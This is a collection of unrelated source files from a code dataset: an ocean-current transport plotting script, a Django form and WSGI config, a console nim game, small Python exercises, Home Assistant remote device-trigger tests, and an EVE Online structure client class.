egtrans=(daily.where(daily.salinity<34.8)['across track velocity'][1:,:-1,:]*depthdiffmat[1:,:,:]*middistmat[1:,:,:]/1e3).sum('distance').sum('depth')
ictrans=(daily.where(daily.salinity>=34.85)['across track velocity'][1:,:-1,:]*depthdiffmat[1:,:,:]*middistmat[1:,:,:]/1e3).sum('distance').sum('depth')
cctrans.plot(figsize=(12,3),label='East Greenland COASTAL Current')
egtrans.plot(label='East Greenlandic Current Waters')
# axhline(0)
# egtrans.resample('M',how='mean',dim='date').plot(linewidth=2,label='',)
ictrans.plot(label='Irminger Current')
ylabel('Transport (Sv)')
legend()
title('EGC system transports')
savefig('../figures/trans/EGsystem_trans.png')
egtrans.plot(figsize=(12,3),label='East Greenlandic Current Waters')
axhline(0)
egtrans.resample('M',how='mean',dim='date').plot(linewidth=2)
ylabel('[Sv]')
title('East Greenlandic Current transport')
savefig('../figures/trans/EGC_trans.png')
savefig('../figures/trans/EGC_trans.pdf')
figure()
egtrans.plot(figsize=(12,3),alpha=0.5,label='')
egtrans.resample('M',dim='date',how='mean').plot(linewidth=2,color='b',label='East Greenland Current')
cctrans_scaled.plot(alpha=0.5,label='')
cctrans_scaled.resample('M',dim='date',how='mean').plot(linewidth=2,color='orange',label='Coastal Current (x 3)')
title('Transport in the EGC system')
ylabel('[Sv]')
legend()
savefig('../figures/trans/EGCboth_trans.png')
savefig('../figures/trans/EGCboth_trans.pdf',bbox_inches='tight')
ictrans.plot(figsize=(12,3))
ictrans.resample('M',how='mean',dim='date').plot(linewidth=2)
ylabel('Transport (Sv)')
title('Irminger Current transport')
savefig('../figures/trans/IC_trans.png')
hexbin(daily.salinity.values.flatten(),daily.temperature.values.flatten(),bins='log',cmap=cm.hot_r)
axvline(34.8,color='k')
colorbar(label='[log of number of measurements]')
ylabel('potential temperature [$^\circ$ C]')
xlabel('salinity')
title('Separation of Polar and Atlantic Water at 34.8')
savefig('../figures/trans/TS_separation.png')
savefig('../figures/trans/TS_separation.pdf',bbox_inches='tight')
#################################################################################
###################### Freshwater transport #####################################
#################################################################################
srefa=34
srefb=34.8
ccfresh=(cf1vel*(daily.salinity[0,:-1,:]-srefa)/srefa*depthdiffmat[0,:,:]*middistmat[0,:,:]).sum('depth')
ccfresh_refb=(cf1vel*(daily.salinity[0,:-1,:]-srefb)/srefb*depthdiffmat[0,:,:]*middistmat[0,:,:]).sum('depth')
ccfresh_scaled=ccfresh*2
figure()
ccfresh.plot(figsize=(12,3),color='orange')
ccfresh.resample('M',dim='date',how='mean').plot(linewidth=2,color='orange')
title('Freshwater transport in the EGCC referenced to 34')
ylabel('mSv')
savefig('../figures/trans/CC_fresh.png')
figure()
ccfresh_refb.plot(figsize=(12,3),color='orange')
ccfresh_refb.resample('M',dim='date',how='mean').plot(linewidth=2,color='orange')
title('Freshwater transport in the referenced to 35')
ylabel('mSv')
savefig('../figures/trans/CC_fresh_refb.png')
egfresh=(daily.where(daily.salinity<34.85)['across track velocity'][1:,:-1,:]*(daily.where(daily.salinity<34.85)['salinity'][1:,:-1,:]-srefb)/srefb*depthdiffmat[1:,:,:]*middistmat[1:,:,:]).sum('distance').sum('depth')
figure()
egfresh.plot(figsize=(12,3))
egfresh.resample('M',dim='date',how='mean').plot(linewidth=2,color='b')
title('Freshwater transport in the EGC')
ylabel('mSv')
savefig('../figures/trans/EGC_fresh.png')
figure()
egfresh.plot(figsize=(12,3),alpha=0.5)
egfresh.resample('M',dim='date',how='mean').plot(linewidth=2,color='b',label='East Greenland Current')
ccfresh_scaled.plot(alpha=0.5)
ccfresh_scaled.resample('M',dim='date',how='mean').plot(linewidth=2,color='orange',label='Coastal Current (x 2)')
title('Freshwater transport in the EGC system')
ylabel('mSv')
legend()
savefig('../figures/trans/EGCboth_fresh.png')
savefig('../figures/trans/EGCboth_fresh.pdf',bbox_inches='tight')
icfresh=(daily.where(daily.salinity>=34.85)['across track velocity'][1:,:-1,:]*(daily.where(daily.salinity>=34.85)['salinity'][1:,:-1,:]-srefb)/srefb*depthdiffmat[1:,:,:]*middistmat[1:,:,:]/1e3).sum('distance').sum('depth')
icfresh.plot(figsize=(12,3))
icfresh.resample('M',dim='date',how='mean').plot(linewidth=2,color='b')
title('Freshwater transport in the IC')
ylabel('mSv')
| [
"[email protected]"
] | |
e10a899ea0e195ad55ab677dbc9616a9e3f64832 | f72fa4432e6abb742cbf1c61c580db1ed688a311 | /day27/s21crm/crm/forms/school.py | c8e42b166247fd56e11cee8ef0a4b0e7def14cb2 | [] | no_license | huningfei/python | 7ddc9da14a3e53ad1c98fc48edd1697a6f8fc4f7 | 9ca1f57f2ef5d77e3bb52d70ac9a241b8cde54d2 | refs/heads/master | 2022-10-31T18:56:33.894302 | 2019-01-04T11:06:59 | 2019-01-04T11:06:59 | 128,178,516 | 2 | 1 | null | 2022-10-12T19:26:04 | 2018-04-05T08:25:32 | Python | UTF-8 | Python | false | false | 401 | py | from django import forms
from crm import models
class SchoolModelForm(forms.ModelForm):
class Meta:
model = models.School # 这里前面的model一定不要写models
fields = '__all__'
error_messages = {
'title': {'required': '学校不能为空'}
}
widgets = {
'title': forms.TextInput(attrs={'class': 'form-control'})
}
| [
"[email protected]"
] | |
909457621a61debda7558bb9f60c2c7feb57b2d0 | 76a402b7db1432f9bf8b9605416521a4284ce1e2 | /nim_game.py | 95d3be8cab232b6f99b6eef35ff32fa60baa5ddf | [] | no_license | SuguruChhaya/nim-game | 7aa915a475d414288fbb33957cad88ec4dac0c1d | 6f345a36dc3a26ee8e5f89c139718a21b7050232 | refs/heads/master | 2022-12-13T01:30:04.352715 | 2020-09-22T23:42:51 | 2020-09-22T23:42:51 | 285,307,692 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,498 | py | import random
'''
Not to create objects but just to manage the methods.
'''
class MainGame():
def __init__(self, reaching_number, increment, goesfirst):
self.reaching_number = reaching_number
self.increment = increment
self.goesfirst = goesfirst
#*Keeps track of the previous numbers
self.total = 0
self.current_choice = 0
#*Finding the reaching_number - 1 number
self.ending_win_number = self.reaching_number - 1
self.follow_increment = self.increment + 1
#*Rather than making the move based on the past move, I should try to get it close to the win_number_list
self.win_number_list = []
for i in range(self.ending_win_number, 0, -1 * self.follow_increment):
self.win_number_list.append(i)
self.win_number_list = sorted(self.win_number_list)
def gotoplayerturn(self):
if self.goesfirst == '0':
self.no_input_character()
elif self.goesfirst == '1':
self.input_character()
def no_input_character(self):
#*This function os for the characters without inputs (computer, you advice)
print("\nThe computer's turn")
print(f"\nCurrent total: {self.total}")
if self.total not in self.win_number_list:
for i in self.win_number_list:
if i > self.total and i - self.total <= self.increment:
self.current_choice = i - self.total
print(f"The computer chooses: {self.current_choice}\n")
self.total += self.current_choice
#*Just in case the player knows the strategy and there is no hope to win,
#*I will pick a random int
elif self.total in self.win_number_list:
self.current_choice = random.randint(1, self.increment)
print(f"The computer chooses: {self.current_choice}\n")
self.total += self.current_choice
if self.total >= self.reaching_number:
print(f"The computer reached {self.reaching_number}.")
print("The computer loses.")
else:
self.input_character()
def input_character(self):
#*This function is for the characters with inputs (you, your friend)
not_valid = True
while not_valid:
print('\nYour turn:')
print(f"\nCurrent total: {self.total}")
print(f"Pick the increment (max:{self.increment})")
self.current_choice = input("You choose: ")
try:
self.current_choice = int(self.current_choice)
if not 1 <= self.current_choice <= self.increment:
raise(ValueError)
else:
self.total += self.current_choice
not_valid = False
if self.total >= self.reaching_number:
print(f"You reached {self.reaching_number}.")
print("You lose.")
else:
self.no_input_character()
except ValueError:
print("Enter valid command or integer.")
not_valid = True
print("\nWelcome to the nim game! \nYou will count from 1 to the reaching number. \nYou will choose the max increment and the reaching number.\nSince the computer will perform the best possible moves to win, you can use this program to beat your friends!")
not_valid = True
while not_valid:
try:
print("\nThe reaching number has to be between 20 and 100 (inclusive).")
reaching_number_str = input("Enter reaching number: ")
print("\nThe max increment has to be between 3 and 10 (inclusive).")
incement_str = input("Enter max increment: ")
reaching_number = int(reaching_number_str)
increment = int(incement_str)
not_valid = False
if (not 20 <= reaching_number <= 100) or (not 3 <= increment <= 10):
raise(ValueError)
else:
zero_player = "The computer"
one_player = "You"
goesfirst = input(f"Who goes first: 0({zero_player}) or 1({one_player})>")
if goesfirst in ['0', '1']:
game = MainGame(reaching_number, increment, goesfirst)
game.gotoplayerturn()
else:
raise (ValueError)
except ValueError:
print("Enter a valid command or integer.")
not_valid = True
| [
"[email protected]"
] | |
6759479a9640fc8ea7ba928109da4abbb456fb4a | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/25/usersdata/112/12124/submittedfiles/av1_3.py | 0b936ae903da1273501fd3e5f09c85bf73708585 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 219 | py | # -*- coding: utf-8 -*-
from __future__ import division
import math
zeta=0
tan=0
a=input('Digite o valor de a')
b=input('Digite o valor de b')
c=a%b
while a%b!=0:
if b%c!=0:
b=zeta
zeta=a
print(zeta) | [
"[email protected]"
] | |
36eef88f9be11b834b7c966f8e0e37c3e0e6c41b | 8388d0ed8ad412c47d47dd9da8f05e35f7e2644c | /accepted/48-rotate-image.py | 7a18dd7fa4f48ec671c91742020ac5e4795f1851 | [] | no_license | luodichen/leetcode-solution | d4cd5abbb0f5cf640035b563ed566c706d4fcbed | 74c2f9e0e60e64c84be6db9b0511db037d12b109 | refs/heads/master | 2020-05-16T16:45:42.056541 | 2015-11-16T05:41:59 | 2015-11-16T05:41:59 | 39,545,259 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 606 | py | # https://leetcode.com/problems/rotate-image/
class Solution:
# @param {integer[][]} matrix
# @return {void} Do not return anything, modify matrix in-place instead.
def rotate(self, matrix):
if 0 == len(matrix):
return list()
result = []
col_len = len(matrix[0])
for i in xrange(col_len):
result_row = []
for row in matrix[::-1]:
result_row.append(row[i])
result.append(result_row)
del matrix[:]
for row in result:
matrix.append(row)
| [
"[email protected]"
] | |
01ef88728bf02ea3ad9fac6b0c5c4f64a492c30a | 96dcea595e7c16cec07b3f649afd65f3660a0bad | /tests/components/remote/test_device_trigger.py | b5dcca3dc4c9f2fe772eca66fdec608d73ab918b | [
"Apache-2.0"
] | permissive | home-assistant/core | 3455eac2e9d925c92d30178643b1aaccf3a6484f | 80caeafcb5b6e2f9da192d0ea6dd1a5b8244b743 | refs/heads/dev | 2023-08-31T15:41:06.299469 | 2023-08-31T14:50:53 | 2023-08-31T14:50:53 | 12,888,993 | 35,501 | 20,617 | Apache-2.0 | 2023-09-14T21:50:15 | 2013-09-17T07:29:48 | Python | UTF-8 | Python | false | false | 13,958 | py | """The test for remote device automation."""
from datetime import timedelta
import pytest
from pytest_unordered import unordered
import homeassistant.components.automation as automation
from homeassistant.components.device_automation import DeviceAutomationType
from homeassistant.components.remote import DOMAIN
from homeassistant.const import STATE_OFF, STATE_ON, EntityCategory
from homeassistant.core import HomeAssistant
from homeassistant.helpers import device_registry as dr, entity_registry as er
from homeassistant.helpers.entity_registry import RegistryEntryHider
from homeassistant.setup import async_setup_component
import homeassistant.util.dt as dt_util
from tests.common import (
MockConfigEntry,
async_fire_time_changed,
async_get_device_automation_capabilities,
async_get_device_automations,
async_mock_service,
)
@pytest.fixture(autouse=True, name="stub_blueprint_populate")
def stub_blueprint_populate_autouse(stub_blueprint_populate: None) -> None:
"""Stub copying the blueprints to the config folder."""
@pytest.fixture
def calls(hass):
"""Track calls to a mock service."""
return async_mock_service(hass, "test", "automation")
async def test_get_triggers(
hass: HomeAssistant,
device_registry: dr.DeviceRegistry,
entity_registry: er.EntityRegistry,
) -> None:
"""Test we get the expected triggers from a remote."""
config_entry = MockConfigEntry(domain="test", data={})
config_entry.add_to_hass(hass)
device_entry = device_registry.async_get_or_create(
config_entry_id=config_entry.entry_id,
connections={(dr.CONNECTION_NETWORK_MAC, "12:34:56:AB:CD:EF")},
)
entity_entry = entity_registry.async_get_or_create(
DOMAIN, "test", "5678", device_id=device_entry.id
)
expected_triggers = [
{
"platform": "device",
"domain": DOMAIN,
"type": trigger,
"device_id": device_entry.id,
"entity_id": entity_entry.id,
"metadata": {"secondary": False},
}
for trigger in ["changed_states", "turned_off", "turned_on"]
]
triggers = await async_get_device_automations(
hass, DeviceAutomationType.TRIGGER, device_entry.id
)
assert triggers == unordered(expected_triggers)
@pytest.mark.parametrize(
("hidden_by", "entity_category"),
(
(RegistryEntryHider.INTEGRATION, None),
(RegistryEntryHider.USER, None),
(None, EntityCategory.CONFIG),
(None, EntityCategory.DIAGNOSTIC),
),
)
async def test_get_triggers_hidden_auxiliary(
hass: HomeAssistant,
device_registry: dr.DeviceRegistry,
entity_registry: er.EntityRegistry,
hidden_by,
entity_category,
) -> None:
"""Test we get the expected triggers from a hidden or auxiliary entity."""
config_entry = MockConfigEntry(domain="test", data={})
config_entry.add_to_hass(hass)
device_entry = device_registry.async_get_or_create(
config_entry_id=config_entry.entry_id,
connections={(dr.CONNECTION_NETWORK_MAC, "12:34:56:AB:CD:EF")},
)
entity_entry = entity_registry.async_get_or_create(
DOMAIN,
"test",
"5678",
device_id=device_entry.id,
entity_category=entity_category,
hidden_by=hidden_by,
)
expected_triggers = [
{
"platform": "device",
"domain": DOMAIN,
"type": trigger,
"device_id": device_entry.id,
"entity_id": entity_entry.id,
"metadata": {"secondary": True},
}
for trigger in ["changed_states", "turned_off", "turned_on"]
]
triggers = await async_get_device_automations(
hass, DeviceAutomationType.TRIGGER, device_entry.id
)
assert triggers == unordered(expected_triggers)
async def test_get_trigger_capabilities(
hass: HomeAssistant,
device_registry: dr.DeviceRegistry,
entity_registry: er.EntityRegistry,
) -> None:
"""Test we get the expected capabilities from a remote trigger."""
config_entry = MockConfigEntry(domain="test", data={})
config_entry.add_to_hass(hass)
device_entry = device_registry.async_get_or_create(
config_entry_id=config_entry.entry_id,
connections={(dr.CONNECTION_NETWORK_MAC, "12:34:56:AB:CD:EF")},
)
entity_registry.async_get_or_create(
DOMAIN, "test", "5678", device_id=device_entry.id
)
expected_capabilities = {
"extra_fields": [
{"name": "for", "optional": True, "type": "positive_time_period_dict"}
]
}
triggers = await async_get_device_automations(
hass, DeviceAutomationType.TRIGGER, device_entry.id
)
for trigger in triggers:
capabilities = await async_get_device_automation_capabilities(
hass, DeviceAutomationType.TRIGGER, trigger
)
assert capabilities == expected_capabilities
async def test_get_trigger_capabilities_legacy(
hass: HomeAssistant,
device_registry: dr.DeviceRegistry,
entity_registry: er.EntityRegistry,
) -> None:
"""Test we get the expected capabilities from a remote trigger."""
config_entry = MockConfigEntry(domain="test", data={})
config_entry.add_to_hass(hass)
device_entry = device_registry.async_get_or_create(
config_entry_id=config_entry.entry_id,
connections={(dr.CONNECTION_NETWORK_MAC, "12:34:56:AB:CD:EF")},
)
entity_registry.async_get_or_create(
DOMAIN, "test", "5678", device_id=device_entry.id
)
expected_capabilities = {
"extra_fields": [
{"name": "for", "optional": True, "type": "positive_time_period_dict"}
]
}
triggers = await async_get_device_automations(
hass, DeviceAutomationType.TRIGGER, device_entry.id
)
for trigger in triggers:
trigger["entity_id"] = entity_registry.async_get(trigger["entity_id"]).entity_id
capabilities = await async_get_device_automation_capabilities(
hass, DeviceAutomationType.TRIGGER, trigger
)
assert capabilities == expected_capabilities
async def test_if_fires_on_state_change(
hass: HomeAssistant,
entity_registry: er.EntityRegistry,
calls,
enable_custom_integrations: None,
) -> None:
"""Test for turn_on and turn_off triggers firing."""
entry = entity_registry.async_get_or_create(DOMAIN, "test", "5678")
hass.states.async_set(entry.entity_id, STATE_ON)
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: [
{
"trigger": {
"platform": "device",
"domain": DOMAIN,
"device_id": "",
"entity_id": entry.id,
"type": "turned_on",
},
"action": {
"service": "test.automation",
"data_template": {
"some": "turn_on {{ trigger.%s }}"
% "}} - {{ trigger.".join(
(
"platform",
"entity_id",
"from_state.state",
"to_state.state",
"for",
)
)
},
},
},
{
"trigger": {
"platform": "device",
"domain": DOMAIN,
"device_id": "",
"entity_id": entry.id,
"type": "turned_off",
},
"action": {
"service": "test.automation",
"data_template": {
"some": "turn_off {{ trigger.%s }}"
% "}} - {{ trigger.".join(
(
"platform",
"entity_id",
"from_state.state",
"to_state.state",
"for",
)
)
},
},
},
{
"trigger": {
"platform": "device",
"domain": DOMAIN,
"device_id": "",
"entity_id": entry.id,
"type": "changed_states",
},
"action": {
"service": "test.automation",
"data_template": {
"some": "turn_on_or_off {{ trigger.%s }}"
% "}} - {{ trigger.".join(
(
"platform",
"entity_id",
"from_state.state",
"to_state.state",
"for",
)
)
},
},
},
]
},
)
assert len(calls) == 0
hass.states.async_set(entry.entity_id, STATE_OFF)
await hass.async_block_till_done()
assert len(calls) == 2
assert {calls[0].data["some"], calls[1].data["some"]} == {
f"turn_off device - {entry.entity_id} - on - off - None",
f"turn_on_or_off device - {entry.entity_id} - on - off - None",
}
hass.states.async_set(entry.entity_id, STATE_ON)
await hass.async_block_till_done()
assert len(calls) == 4
assert {calls[2].data["some"], calls[3].data["some"]} == {
f"turn_on device - {entry.entity_id} - off - on - None",
f"turn_on_or_off device - {entry.entity_id} - off - on - None",
}
async def test_if_fires_on_state_change_legacy(
hass: HomeAssistant,
entity_registry: er.EntityRegistry,
calls,
enable_custom_integrations: None,
) -> None:
"""Test for turn_on and turn_off triggers firing."""
entry = entity_registry.async_get_or_create(DOMAIN, "test", "5678")
hass.states.async_set(entry.entity_id, STATE_ON)
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: [
{
"trigger": {
"platform": "device",
"domain": DOMAIN,
"device_id": "",
"entity_id": entry.entity_id,
"type": "turned_off",
},
"action": {
"service": "test.automation",
"data_template": {
"some": "turn_off {{ trigger.%s }}"
% "}} - {{ trigger.".join(
(
"platform",
"entity_id",
"from_state.state",
"to_state.state",
"for",
)
)
},
},
},
]
},
)
assert len(calls) == 0
hass.states.async_set(entry.entity_id, STATE_OFF)
await hass.async_block_till_done()
assert len(calls) == 1
assert (
calls[0].data["some"]
== f"turn_off device - {entry.entity_id} - on - off - None"
)
async def test_if_fires_on_state_change_with_for(
hass: HomeAssistant,
entity_registry: er.EntityRegistry,
calls,
enable_custom_integrations: None,
) -> None:
"""Test for triggers firing with delay."""
entry = entity_registry.async_get_or_create(DOMAIN, "test", "5678")
hass.states.async_set(entry.entity_id, STATE_ON)
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: [
{
"trigger": {
"platform": "device",
"domain": DOMAIN,
"device_id": "",
"entity_id": entry.id,
"type": "turned_off",
"for": {"seconds": 5},
},
"action": {
"service": "test.automation",
"data_template": {
"some": "turn_off {{ trigger.%s }}"
% "}} - {{ trigger.".join(
(
"platform",
"entity_id",
"from_state.state",
"to_state.state",
"for",
)
)
},
},
}
]
},
)
await hass.async_block_till_done()
assert len(calls) == 0
hass.states.async_set(entry.entity_id, STATE_OFF)
await hass.async_block_till_done()
assert len(calls) == 0
async_fire_time_changed(hass, dt_util.utcnow() + timedelta(seconds=10))
await hass.async_block_till_done()
assert len(calls) == 1
await hass.async_block_till_done()
assert (
calls[0].data["some"]
== f"turn_off device - {entry.entity_id} - on - off - 0:00:05"
)
| [
"[email protected]"
] | |
810e8fc904dfdccceb4282cca5aa2a50ec0181a8 | 5864e86954a221d52d4fa83a607c71bacf201c5a | /eve/client/script/environment/spaceObject/structure.py | 88fcfaaef3632e06940848939a4cc0691a53f89d | [] | no_license | connoryang/1v1dec | e9a2303a01e5a26bf14159112b112be81a6560fd | 404f2cebf13b311e754d45206008918881496370 | refs/heads/master | 2021-05-04T02:34:59.627529 | 2016-10-19T08:56:26 | 2016-10-19T08:56:26 | 71,334,417 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,417 | py | #Embedded file name: e:\jenkins\workspace\client_SERENITY\branches\release\SERENITY\eve\client\script\environment\spaceObject\structure.py
import blue
import uthread
import structures
import evetypes
import logging
from eve.client.script.environment.spaceObject.buildableStructure import BuildableStructure
from eve.client.script.environment.model.turretSet import TurretSet
from evegraphics.explosions.spaceObjectExplosionManager import SpaceObjectExplosionManager
STATE_CONSTRUCT = 'construct'
STATE_VULNERABLE = 'vulnerable'
STATE_INVULNERABLE = 'invulnerable'
STATE_SIEGED = 'sieged'
STATE_DECONSTRUCT = 'deconstruct'
STATES = {structures.STATE_UNKNOWN: STATE_INVULNERABLE,
structures.STATE_UNANCHORED: STATE_DECONSTRUCT,
structures.STATE_ANCHORING: STATE_CONSTRUCT,
structures.STATE_ONLINE: STATE_INVULNERABLE,
structures.STATE_SHIELD_VULNERABLE: STATE_VULNERABLE,
structures.STATE_SHIELD_REINFORCE: STATE_SIEGED,
structures.STATE_ARMOR_VULNERABLE: STATE_VULNERABLE,
structures.STATE_ARMOR_REINFORCE: STATE_SIEGED,
structures.STATE_HULL_VULNERABLE: STATE_VULNERABLE}
class Structure(BuildableStructure):
__unloadable__ = True
def __init__(self):
BuildableStructure.__init__(self)
self.Init()
def Release(self):
BuildableStructure.Release(self)
self.Init()
def Init(self):
self.fitted = False
self.state = None
self.timer = None
self.turrets = []
self.modules = {}
def Assemble(self):
self.SetStaticRotation()
self.SetupSharedAmbientAudio()
self.OnSlimItemUpdated(self.typeData.get('slimItem'))
def OnSlimItemUpdated(self, item):
if item is None or self.unloaded:
return
if item.state and (item.state != self.state or item.timer != self.timer):
if item.timer and item.state == structures.STATE_ANCHORING:
start, end, paused = item.timer
duration = (end - start) / const.SEC
elapsed = duration - max(end - blue.os.GetWallclockTime(), 0L) / const.SEC
else:
duration = 0
elapsed = 0
self.state = item.state
self.timer = item.timer
self.GotoState(STATES[self.state], duration, elapsed)
if set([ i[0] for i in item.modules or [] if evetypes.GetGraphicID(i[1]) is not None ]) != set(self.modules.keys()):
uthread.new(self.ReloadHardpoints)
def OnDamageState(self, damageState):
BuildableStructure.OnDamageState(self, damageState)
if self.model is not None and damageState is not None:
states = [ (d if d is not None else 0.0) for d in damageState ]
self.model.SetImpactDamageState(states[0], states[1], states[2], False)
def GotoState(self, state, totalTime = 0, elapsedTime = 0):
if state == STATE_CONSTRUCT:
uthread.new(self.BuildStructure, float(totalTime), float(elapsedTime))
elif state == STATE_DECONSTRUCT:
uthread.new(self.TearDownStructure, float(totalTime), float(elapsedTime))
else:
uthread.new(self.LoadModelWithState, state)
def LoadModelWithState(self, newState):
if self.model is None:
self.LoadModel()
self.TriggerAnimation(newState)
self.FitHardpoints()
self.StartStructureLoopAnimation()
def LoadModel(self, fileName = None, loadedModel = None):
self.model = self.GetStructureModel()
self.SetAnimationSequencer(self.model)
self.NotifyModelLoaded()
def ReloadHardpoints(self):
self.UnfitHardpoints()
self.FitHardpoints()
def UnfitHardpoints(self):
if not self.fitted:
return
self.logger.debug('Unfitting hardpoints')
newModules = {}
for key, val in self.modules.iteritems():
if val not in self.turrets:
newModules[key] = val
self.modules = newModules
del self.turrets[:]
self.fitted = False
def FitHardpoints(self, blocking = False):
if self.fitted:
return
if self.model is None:
self.logger.warning('FitHardpoints - No model')
return
self.logger.debug('Fitting hardpoints')
self.fitted = True
newTurretSetDict = TurretSet.FitTurrets(self.id, self.model, self.typeData.get('sofFactionName', None))
self.turrets = []
for key, val in newTurretSetDict.iteritems():
self.modules[key] = val
self.turrets.append(val)
def LookAtMe(self):
if not self.model:
return
if not self.fitted:
self.FitHardpoints()
def StopStructureLoopAnimation(self):
animationUpdater = self.GetStructureModel().animationUpdater
if animationUpdater is not None:
animationUpdater.PlayLayerAnimation('TrackMaskLayer1', 'Layer1Loop', False, 1, 0, 1, True)
def StartStructureLoopAnimation(self):
animationUpdater = self.GetStructureModel().animationUpdater
if animationUpdater is not None:
animationUpdater.PlayLayerAnimation('TrackMaskLayer1', 'Layer1Loop', False, 0, 0, 1, True)
def BuildStructure(self, anchoringTime, elapsedTime):
self.LoadUnLoadedModels()
self.logger.debug('Structure: BuildStructure %s', self.GetTypeID())
self.PreBuildingSteps()
delay = int((anchoringTime - elapsedTime) * 1000)
uthread.new(self._EndStructureBuild, delay)
self.TriggerAnimation(STATE_CONSTRUCT, curveLength=anchoringTime, elapsedTime=elapsedTime)
def _EndStructureBuild(self, delay):
blue.pyos.synchro.SleepSim(delay)
if self.released or self.exploded:
return
self.StartStructureLoopAnimation()
self.PostBuildingSteps(True)
self.LoadModel()
def TearDownStructure(self, unanchoringTime, elapsedTime):
self.LoadUnLoadedModels()
self.logger.debug('Structure: TearDownStructure %s', self.GetTypeID())
self.StopStructureLoopAnimation()
self.PreBuildingSteps()
delay = int((unanchoringTime - elapsedTime) * 1000)
uthread.new(self._EndStructureTearDown, delay)
self.TriggerAnimation(STATE_DECONSTRUCT, curveLength=unanchoringTime, elapsedTime=elapsedTime)
def _EndStructureTearDown(self, delay):
blue.pyos.synchro.SleepSim(delay)
if self.released or self.exploded:
return
self.PostBuildingSteps(False)
self.model = self.GetNanoContainerModel()
def Explode(self, explosionURL = None, scaling = 1.0, managed = False, delay = 0.0):
if SpaceObjectExplosionManager.USE_EXPLOSION_BUCKETS:
self.logger.debug('Exploding with explosion bucket')
scene = sm.GetService('space').GetScene()
wreckSwitchTime, _, __ = SpaceObjectExplosionManager.ExplodeBucketForBall(self, scene)
return wreckSwitchTime
explosionURL, (delay, _) = self.GetExplosionInfo()
explosionLocatorSets = None
if hasattr(self.model, 'locatorSets'):
explosionLocatorSets = self.model.locatorSets.FindByName('explosions')
rotation = self.GetStaticRotation()
self.explosionManager.PlayClientSideExplosionBall(explosionURL, (self.x, self.y, self.z), rotation, explosionLocatorSets)
return delay
| [
"[email protected]"
] | |
d52e595dc32e6ffdf0abd0ec6fc0f348ce9ada5e | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03089/s662353627.py | 14c606722f6e0774d8c3d2625e893ec714620f0c | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 365 | py | n = int(input())
b = list(map(int , input().split()))
def f(c):
for i in reversed(range(len(c))):
if c[i] == i+1:
return (c[i], c[:i] + c[i+1:])
return (-1, c)
ans = []
for i in range(n):
(a, b) = f(b)
if a == -1:
print(-1)
exit()
ans.append(a)
#print(ans, b)
print('\n'.join(map(str, reversed(ans))))
| [
"[email protected]"
] | |
7249037b709c0aa0c8542843b0645547e32df6f8 | a08492c20c6bda0282170fee569f3cd199876ec7 | /scr/return_directories.py | 6e090bc090e123ede17864f4f68be58e20f41193 | [] | no_license | GregoryREvans/evans | a7744011ccd2395e15d325092e85a31379717e6d | 7b0f7caa55e1c4b2a733b9b6fc42230a43313fb6 | refs/heads/master | 2023-08-31T04:29:31.296222 | 2023-08-21T02:32:12 | 2023-08-21T02:32:12 | 143,075,881 | 4 | 1 | null | 2021-06-06T07:27:38 | 2018-07-31T22:22:06 | Python | UTF-8 | Python | false | false | 425 | py | import pathlib
def return_directories(
p="/Users/gregoryevans/Scores",
ignores=("_archive", ".mypy_cache", "_squonk", "akasha", "stirrings_still"),
):
build_path = pathlib.Path(p)
returns = []
for score in sorted(build_path.iterdir()):
if not score.is_dir():
continue
if score.name in ignores:
continue
else:
returns.append(score)
returns
| [
"[email protected]"
] | |
c37631b47a0b6af83326403ee829649b804d3d58 | f9697acaab8a8ee05ccbd5368f6c72ad8c5dd485 | /backend/test_23115/wsgi.py | d1ce4e85722e439b0c888cf764cf31d84dc3e907 | [] | no_license | crowdbotics-apps/test-23115 | f6fd5b199d5586aed78f0a9844062c83ee0ab574 | c6e7f7cf32130aa45fb31bba3fa67ad8e0346e82 | refs/heads/master | 2023-01-24T22:13:58.393735 | 2020-12-01T16:37:00 | 2020-12-01T16:37:00 | 317,603,669 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 397 | py | """
WSGI config for test_23115 project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'test_23115.settings')
application = get_wsgi_application()
| [
"[email protected]"
] | |
16e7a75e20aad03573da75c844a7329f52d68fe5 | 32c56293475f49c6dd1b0f1334756b5ad8763da9 | /google-cloud-sdk/lib/surface/container/node_pools/__init__.py | 245eda35f54a0e9605d06f2abed352e8ec9f670c | [
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0",
"MIT"
] | permissive | bopopescu/socialliteapp | b9041f17f8724ee86f2ecc6e2e45b8ff6a44b494 | 85bb264e273568b5a0408f733b403c56373e2508 | refs/heads/master | 2022-11-20T03:01:47.654498 | 2020-02-01T20:29:43 | 2020-02-01T20:29:43 | 282,403,750 | 0 | 0 | MIT | 2020-07-25T08:31:59 | 2020-07-25T08:31:59 | null | UTF-8 | Python | false | false | 1,982 | py | # -*- coding: utf-8 -*- #
# Copyright 2016 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
